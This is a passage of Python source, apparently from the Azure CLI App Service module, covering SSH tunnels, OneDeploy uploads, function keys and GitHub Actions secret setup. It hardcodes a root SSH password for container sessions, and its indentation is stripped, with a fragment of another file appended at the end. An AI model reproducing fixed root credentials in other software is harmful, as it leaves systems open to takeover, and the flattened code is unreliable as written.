# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise ValidationError("The provided instance '{}' is not valid "
"for this webapp and slot.".format(instance))
raise ValidationError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise ResourceNotFoundError("Either '{}' is not a valid local file path or you do not have permissions to "
"access it".format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise ResourceNotFoundError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deployment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise ResourceNotFoundError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise ValidationError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='filesystem')
# TODO remove once appservice-kube extension removes
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise ValidationError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if(app_runtime_info and app_runtime_info['display_name']):
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: '
'{runtime}. Using the specified runtime {runtime}.')
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise ValidationError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(cmd=cmd, runtime_string=app_runtime_string, is_linux=is_linux):
raise ValidationError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ValidationError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise ValidationError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise ResourceNotFoundError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
if java_container_split and len(java_container_split) >= 2:
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise ResourceNotFoundError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise ResourceNotFoundError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise ValidationError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(cmd, runtime_string, is_linux):
helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
matched_runtime = helper.resolve(runtime_string, is_linux)
if not matched_runtime:
return False
if matched_runtime.github_actions_properties:
return True
return False
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(cmd, app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
# TODO try and get better API support for windows stacks
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = '3.1'
app_runtime_version = ""
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(cmd, app_runtime, app_runtime_version, is_linux):
helper = _StackRuntimeHelper(cmd, linux=(is_linux), windows=(not is_linux))
if not is_linux:
matched_runtime = helper.resolve("{}|{}".format(app_runtime, app_runtime_version), is_linux)
else:
matched_runtime = helper.resolve(app_runtime, is_linux)
gh_props = None if not matched_runtime else matched_runtime.github_actions_properties
if gh_props:
if gh_props.get("github_actions_version"):
if is_linux:
return {
"display_name": app_runtime,
"github_actions_version": gh_props["github_actions_version"]
}
if gh_props.get("app_runtime_version").lower() == app_runtime_version.lower():
return {
"display_name": app_runtime,
"github_actions_version": gh_props["github_actions_version"]
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
def show_webapp(cmd, resource_group_name, name, slot=None): # adding this to not break extensions
return show_app(cmd, resource_group_name, name, slot)
|
store.py
|
import datetime
import json
import threading
import uuid
from collections import defaultdict
from copy import deepcopy
from dictdiffer import diff
